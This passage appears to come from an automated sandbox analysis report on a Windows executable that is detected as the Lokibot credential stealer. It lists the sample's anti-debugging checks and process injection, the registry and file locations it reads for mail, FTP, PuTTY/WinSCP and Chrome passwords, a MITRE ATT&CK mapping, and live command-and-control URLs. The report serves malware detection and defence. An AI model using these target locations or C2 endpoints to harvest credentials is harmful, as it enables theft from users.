              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: 0_2_00405C49 GetModuleHandleA,LoadLibraryA,GetProcAddress,
              Source: C:\Users\user\Desktop\U001P56ybm.exeFile created: C:\Users\user\AppData\Local\Temp\nsi3BDD.tmp\yqbozdxn.dllJump to dropped file
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess information set: NOGPFAULTERRORBOX
              Source: C:\Users\user\Desktop\U001P56ybm.exe TID: 5604Thread sleep time: -180000s >= -30000s
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: 0_2_00405250 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: 0_2_00405C22 FindFirstFileA,FindClose,
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: 0_2_00402630 FindFirstFileA,
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: 2_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: 2_1_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,
              Source: C:\Users\user\Desktop\U001P56ybm.exeThread delayed: delay time: 60000
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: 0_2_10010C55 IsDebuggerPresent,
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: 0_2_10013280 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: 0_2_00405C49 GetModuleHandleA,LoadLibraryA,GetProcAddress,
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: 0_2_10001000 GetProcessHeap,HeapAlloc,RegCreateKeyExW,GetProcessHeap,HeapFree,
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess token adjusted: Debug
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: 2_2_0040317B mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: 2_1_0040317B mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: 0_2_1000EE31 SetUnhandledExceptionFilter,UnhandledExceptionFilter,

              HIPS / PFW / Operating System Protection Evasion:

              barindex
              Injects a PE file into a foreign processesShow sources
              Source: C:\Users\user\Desktop\U001P56ybm.exeMemory written: C:\Users\user\Desktop\U001P56ybm.exe base: 400000 value starts with: 4D5A
              Source: C:\Users\user\Desktop\U001P56ybm.exeProcess created: C:\Users\user\Desktop\U001P56ybm.exe "C:\Users\user\Desktop\U001P56ybm.exe"
              Source: U001P56ybm.exe, 00000002.00000002.545170623.0000000000E30000.00000002.00020000.sdmpBinary or memory string: Program Manager
              Source: U001P56ybm.exe, 00000002.00000002.545170623.0000000000E30000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
              Source: U001P56ybm.exe, 00000002.00000002.545170623.0000000000E30000.00000002.00020000.sdmpBinary or memory string: Progman
              Source: U001P56ybm.exe, 00000002.00000002.545170623.0000000000E30000.00000002.00020000.sdmpBinary or memory string: Progmanlock
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: 0_2_10010E55 cpuid
              Source: C:\Users\user\Desktop\U001P56ybm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: 0_2_0040594D GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: 2_2_00406069 GetUserNameW,

              Stealing of Sensitive Information:

              barindex
              Yara detected LokibotShow sources
              Source: Yara matchFile source: 00000002.00000002.544999471.00000000005D8000.00000004.00000020.sdmp, type: MEMORY
              Source: Yara matchFile source: 2.0.U001P56ybm.exe.400000.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.U001P56ybm.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.U001P56ybm.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.U001P56ybm.exe.2430000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.U001P56ybm.exe.400000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.U001P56ybm.exe.400000.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.U001P56ybm.exe.400000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.U001P56ybm.exe.400000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.U001P56ybm.exe.400000.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.U001P56ybm.exe.400000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.1.U001P56ybm.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.U001P56ybm.exe.400000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.U001P56ybm.exe.400000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.U001P56ybm.exe.400000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.1.U001P56ybm.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000000.288584789.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000000.291339925.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000000.292089412.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.295055128.0000000002430000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000000.287455662.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.544827216.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: U001P56ybm.exe PID: 4640, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: U001P56ybm.exe PID: 5684, type: MEMORYSTR
              Tries to steal Mail credentials (via file / registry access)Show sources
              Source: C:\Users\user\Desktop\U001P56ybm.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
              Source: C:\Users\user\Desktop\U001P56ybm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
              Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
              Source: C:\Users\user\Desktop\U001P56ybm.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
              Source: C:\Users\user\Desktop\U001P56ybm.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl
              Tries to harvest and steal ftp login credentialsShow sources
              Source: C:\Users\user\Desktop\U001P56ybm.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
              Source: C:\Users\user\Desktop\U001P56ybm.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
              Source: C:\Users\user\Desktop\U001P56ybm.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
              Source: C:\Users\user\Desktop\U001P56ybm.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
              Tries to steal Mail credentials (via file registry)Show sources
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: PopPassword
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: SmtpPassword
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: PopPassword
              Source: C:\Users\user\Desktop\U001P56ybm.exeCode function: SmtpPassword
              Tries to harvest and steal browser information (history, passwords, etc)Show sources
              Source: C:\Users\user\Desktop\U001P56ybm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: Yara matchFile source: 2.0.U001P56ybm.exe.400000.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.U001P56ybm.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.U001P56ybm.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.U001P56ybm.exe.2430000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.U001P56ybm.exe.400000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.U001P56ybm.exe.400000.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.U001P56ybm.exe.400000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.U001P56ybm.exe.400000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.U001P56ybm.exe.400000.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.U001P56ybm.exe.400000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.1.U001P56ybm.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.U001P56ybm.exe.400000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.U001P56ybm.exe.400000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.U001P56ybm.exe.400000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.1.U001P56ybm.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000000.288584789.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000000.291339925.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000000.292089412.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.295055128.0000000002430000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000000.287455662.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.544827216.0000000000400000.00000040.00000001.sdmp, type: MEMORY

              Remote Access Functionality:

              barindex
              Yara detected LokibotShow sources
              Source: Yara matchFile source: 00000002.00000002.544999471.00000000005D8000.00000004.00000020.sdmp, type: MEMORY
              Source: Yara matchFile source: 2.0.U001P56ybm.exe.400000.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.U001P56ybm.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.U001P56ybm.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.U001P56ybm.exe.2430000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.U001P56ybm.exe.400000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.U001P56ybm.exe.400000.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.U001P56ybm.exe.400000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.U001P56ybm.exe.400000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.U001P56ybm.exe.400000.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.U001P56ybm.exe.400000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.1.U001P56ybm.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.U001P56ybm.exe.400000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.U001P56ybm.exe.400000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.0.U001P56ybm.exe.400000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.1.U001P56ybm.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000002.00000001.292539548.0000000000400000.00000040.00020000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000000.288584789.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000000.291339925.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000000.292089412.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.295055128.0000000002430000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000000.287455662.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.544827216.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: U001P56ybm.exe PID: 4640, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: U001P56ybm.exe PID: 5684, type: MEMORYSTR

              Mitre Att&ck Matrix

              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid AccountsNative API1Path InterceptionAccess Token Manipulation1Deobfuscate/Decode Files or Information1OS Credential Dumping2Account Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
              Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsProcess Injection112Obfuscated Files or Information2Credentials in Registry2File and Directory Discovery2Remote Desktop ProtocolData from Local System2Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Software Packing1Security Account ManagerSystem Information Discovery15SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Masquerading1NTDSSecurity Software Discovery13Distributed Component Object ModelClipboard Data1Scheduled TransferApplication Layer Protocol111SIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptVirtualization/Sandbox Evasion11LSA SecretsProcess Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.commonAccess Token Manipulation1Cached Domain CredentialsVirtualization/Sandbox Evasion11VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
              External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection112DCSyncSystem Owner/User Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

              Behavior Graph

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.

              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              U001P56ybm.exe25%ReversingLabsWin32.Trojan.Nsisx

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Temp\nsi3BDD.tmp\yqbozdxn.dll23%ReversingLabsWin32.Trojan.Tedy

              Unpacked PE Files

              SourceDetectionScannerLabelLinkDownload
              2.0.U001P56ybm.exe.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              2.2.U001P56ybm.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              2.0.U001P56ybm.exe.400000.0.unpack100%AviraTR/Patched.Ren.Gen2Download File
              2.0.U001P56ybm.exe.400000.2.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              2.0.U001P56ybm.exe.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              2.0.U001P56ybm.exe.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              0.2.U001P56ybm.exe.2430000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              2.0.U001P56ybm.exe.400000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              2.0.U001P56ybm.exe.400000.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              2.1.U001P56ybm.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://194.85.248.167/imt/fre.php100%Avira URL Cloudmalware
              http://kbfvzoboss.bid/alien/fre.php0%URL Reputationsafe
              http://alphastand.win/alien/fre.php0%URL Reputationsafe
              http://alphastand.trade/alien/fre.php0%URL Reputationsafe
              http://alphastand.top/alien/fre.php0%URL Reputationsafe
              http://www.ibsensoftware.com/0%URL Reputationsafe

              Domains and IPs

              Contacted Domains

              No contacted domains info

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://194.85.248.167/imt/fre.phptrue
              • Avira URL Cloud: malware
              unknown
              http://kbfvzoboss.bid/alien/fre.phptrue
              • URL Reputation: safe
              unknown
              http://alphastand.win/alien/fre.phptrue
              • URL Reputation: safe
              unknown
              http://alphastand.trade/alien/fre.phptrue
              • URL Reputation: safe
              unknown
              http://alphastand.top/alien/fre.phptrue
              • URL Reputation: safe
              unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://nsis.sf.net/NSIS_ErrorU001P56ybm.exefalse
                high
                http://nsis.sf.net/NSIS_ErrorErrorU001P56ybm.exefalse
                  high
                  http://www.ibsensoftware.com/U001P56ybm.exe, U001P56ybm.exe, 00000002.00000000.288584789.0000000000400000.00000040.00000001.sdmp, U001P56ybm.exe, 00000002.00000002.544827216.0000000000400000.00000040.00000001.sdmpfalse
                  • URL Reputation: safe
                  unknown

                  Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public

                  IPDomainCountryFlagASNASN NameMalicious
                  194.85.248.167
                  unknownRussian Federation
                  35478DATACENTERROtrue

